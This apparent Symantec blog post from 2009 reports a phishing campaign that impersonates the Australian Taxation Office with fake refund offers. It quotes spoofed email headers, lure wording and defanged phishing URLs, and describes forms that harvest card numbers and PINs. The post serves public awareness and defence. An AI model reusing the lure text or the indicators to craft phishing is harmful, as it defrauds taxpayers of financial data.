The bad guys deserve recognition for being ever mindful of significant events and the recent scheme of phishing attacks doesn’t leave us surprised. Symantec recently observed a fresh round of phishing scams targeting the Australian Taxation Office (ATO) at the closing of the financial year.
The opportunistic scammers are distributing phishing emails that falsely claim to be from the ATO, offering online tax refunds. The email bears the tax office logo and a lure to visit the phishing link for the phony tax refund request:
The scam emails have a From and Subject header such as the following:
From: Australian Tax Office <admin@ato.gov>
Subject: ATO Notification-Tax Refund
The text in the message body and the refund amount varies from email to email. However, all of the emails and Web pages have text such as “A refund can be delayed for a variety of reasons. For example submitting invalid records or applying after the deadline” in an attempt to instill some urgency in the intended victim.
Some of the phishing links observed so far are:
(The domain names of several compromised Web servers have been removed)
hxxp://
www.ato.gov.au.australiantaxation.biz/australian-taxation-office/individuals/taxreturn.htmlhxxp://
www.xxxxx.net/ato.gov.au/individuals/index.htm?cmd=_login-run&ID=2138eskof3456ddfdfa13c0db1f1ff10d346422127f86b3&email=hxxp://xxxxxxxxxxx.com/~glicker/tap.ato.gov.au/Tax-refund.html
hxxp://
www.xxxxxxxxxxxxxxxxx.de/css/ato.gov.au/http.s.www.irs.ov%20get%20refunds%20on%20your%20visa%20or%20master%20card%20now%20refunds%20is%20about%20three%20to%20five%20business.www.irs.gove.html.html
Many of the URL links read as the familiar ato.gov.au address and redirect to a page that looks like an actual ATO tax refund Web page. Most of these sites were up and running until 10:30hrs IST, June 14, 2009. The domain australiantaxation.biz was created recently and was operating out of the IP address 216.39.57.104, which is based out of Sunnyvale, USA—the domain is now inactive. Several of the attacks were exploiting existing domains and were traced back to compromised Web servers hosted in Germany.
The input fields ask for the intended victim’s information, such as total taxable income and tax paid in an assessment year, before being directed to a second page seeking credit card details:
Some of the phishing links would redirect the potential victims to a fake tax refund form to acquire details such as a Tax File Number and other general information. At the bottom of the form, details such as a credit card number and ATM pin number are required for the phony tax refund process.
Day after day, fraudsters are getting cleverer and executing their scams using new tricks and tactics. This particular fraud is technically very creative and is well executed. It is interesting to observe that the page actually asks the intended victims to supply details and print the form. The completed form is to then be sent to the mailing address so that the tax refund can be processed (realizing people are aware of phishing links). If someone completes the form and clicks the "Print" button, what actually materializes is that the hapless victim’s credit card details are quickly channeled to a server utilizing the fraud domain.
Symantec observed that the phishing attacks were not very large in number. However, the above schemes of attacks are but a few among other variations targeting Australian taxpayers.
The ATO has taken the phishing attacks into serious regard and has advised people to contact them immediately if anyone has received fraudulent email communications or are unsure of the legitimacy of any communication that claims to be from the ATO. Anyone can report unsolicited emails claiming to be from the ATO by forwarding the entire email to ReportEmailFraud@ato.gov.au—as advised on the ATO website (www.ato.gov.au).
So, what else can you do to protect yourself and your information? Always maintain a level of caution around any messages from within a website or that appear to be sent by a website. If you do click a link, double-check the actual domain that is shown at the top of the page. It’s a best practice to type the direct Web address directly into your address bar rather than rely upon links from a message.
1. Maintain an up-to-date browser and operating system. Use security software, such as Norton Internet Security 2009. Check out Web safety services such as Norton Safe Web, where a community of Web users collaborates to report dangerous phishing and malware sites.
2. Double-check you’ve arrived at your destination. When clicking over to any site make a habit of looking at what appears in the address line. You might not always be able to spot a fake site, but in the case of this particular scam, it’s obviously not www.ato.gov.au.
3. Be suspicious of requests to enter your account name and password or any other confidential information.
Message Edited by Trevor Mack on 06-16-2009 03:09 PM